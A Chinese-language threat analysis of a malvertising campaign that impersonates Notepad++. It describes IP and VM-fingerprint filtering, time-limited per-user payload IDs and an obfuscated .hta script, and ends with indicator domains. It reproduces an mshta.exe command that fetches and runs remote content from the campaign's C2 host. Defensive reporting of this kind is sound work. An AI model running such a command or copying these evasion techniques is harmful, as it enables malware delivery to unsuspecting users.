惡意廣告投放活動如何通過時效性鏈接傳播HTA腳本

寫在前面的話

在最近的研究和分析工作中，我們發現通過Google搜索實現的惡意廣告活動有所增加，目前我們也在跟蹤和分析其中相關的威脅行為者，并對他們在繞過安全檢測并實現攻擊鏈時所使用的技術進行了深入研究。

這些技術將允許威脅行為者通過惡意廣告活動來攻擊企業用戶，并給目標組織帶來嚴重影響，最終實現惡意軟件或勒索軟件的部署。

在這篇文章中，我們將對一次惡意廣告活動進行分析，這個惡意廣告活動似乎已經活躍了好幾個月，而且它們在指紋識別用戶和傳播時間敏感的Payload時所使用的技術也非常獨特。

針對Notepad++的惡意廣告

根據我們的研究發現，這群威脅行為者目前正在針對Notepad++軟件進行惡意廣告活動。Notepad++是一款適用于Windows操作系統的熱門文本編輯器，很多企業或編程人員都會使用這款軟件作為默認的文本編輯器使用。

下面這張圖片顯示的是我們在近期觀察到的惡意廣告活動部分內容，其中所有的惡意廣告都由同一個威脅行為者托管和運行，但他們使用了很多不同的廣告賬號，而這些賬號很可能是在數據泄露事件中被攻擊者收集來的。

當目標用戶點擊其中一個廣告時，惡意代碼會進行第一層過濾。這很有可能是一種IP地址檢查，同時忽略來自VPN和其他非真實IP地址的鏈接請求，進而跳轉到一個誘餌網站：

然而，符合條件的目標用戶點擊惡意廣告之后，會看到一個托管在notepadxtreme[.]com的按照真實Notepad++官網制作的釣魚網站：

VM檢測指紋

當用戶點擊負責執行系統指紋的JavaScript代碼的下載鏈接時，代碼則會進行第二層過濾。我們之前所觀察到的一些惡意廣告活動會嘗試檢測模擬器或虛擬機的存在，盡管他們所使用的代碼不同且更復雜，但這群威脅行為者也做了同樣的事情：

如果檢查結果和規則不匹配，那么目標用戶將會被重定向到真正的Notepad++官網。同時，每一個潛在的目標用戶都會被分配到一個唯一的ID，這個ID將允許他們下載攻擊者的Payload。

時間敏感的自定義下載

該惡意廣告活動與其他活動的另一個不同之處就在于他們所使用的Payload下載方式。每一個用戶都會被分配一個唯一的ID，格式如下：

CukS1=[10 character string][13 digits]

這很可能是為了實現用戶跟蹤而設計的，這也使得每一次下載行為都是獨一無二且時間敏感的：

跟其他惡意廣告活動的另一個不同之處在于，這個惡意廣告活動的Payload時一個.hta腳本，腳本的命名規范跟上面顯示的下載鏈接風格是一致的：

Notepad_Ver_[10 character string][13 digits].hta

如果你嘗試再次使用上述URL地址來下載文件的話，則會遇到404報錯：

.HTA Payload

在我們的分析過程中，我們成功捕捉到了攻擊者所使用的.hta文件，但分析后發現這個腳本文件并沒有完全“武器化”。但是我們發現VirusTotal上在今年7月初曾經有人上傳過一次腳本Payload樣本。這個樣本所使用的命名規范和風格跟我們捕捉到的.hta腳本是一樣的，但它針對的是PDF Converter，而不是Notepad++：

這個腳本經過了嚴格的代碼混淆處理，而且VirusTotal的檢測結果為0。但通過動態分析后，我們發現其中有一個指向遠程域名（(mybigeye[.]icu）的鏈接（使用自定義端口號）：

C:\Windows\SysWOW64\mshta.exe "C:\Windows\System32\mshta.exe"

https://mybigeye .icu:52054/LXGZlAJgmvCaQfer/rWABCTDEqFVGdHIQ.html?client_id=jurmvozdcf1687983013426#he7HAp1X4cgqv5SJykr3lRtaxijL0WPB6sdGnZC9IouwDKf8OEMQTFNbmYzU2V+/=

除此之外，我們還發現腳本在進行遠程連接時，會使用存儲在文件名中的相同client_id。

雖然我們不知道威脅行為者在未來的計劃是什么，但我們相信這是威脅行為者使用Cobalt Strike等工具訪問目標用戶受影響設備的惡意基礎設施的一部分。

惡意廣告威脅行為者一直在技術創新

在過去的幾個月里，惡意廣告活動的數量有所增加，同時其技術復雜程度也在提升。他們正在使用各種規避技術來繞過廣告驗證系統的檢查，并允許他們針對特定類型的目標用戶來實施攻擊。有了可靠的惡意軟件交付鏈，威脅行為者就可以更加專注于他們的誘餌頁面和惡意軟件Payload開發了。

入侵威脅指標IoC

惡意廣告域名

switcodes[.]com

karelisweb[.]com

jquerywins[.]com

mojenyc[.]com

Notepad++釣魚網站

notepadxtreme[.]com

腳本C2

mybigeye[.]icu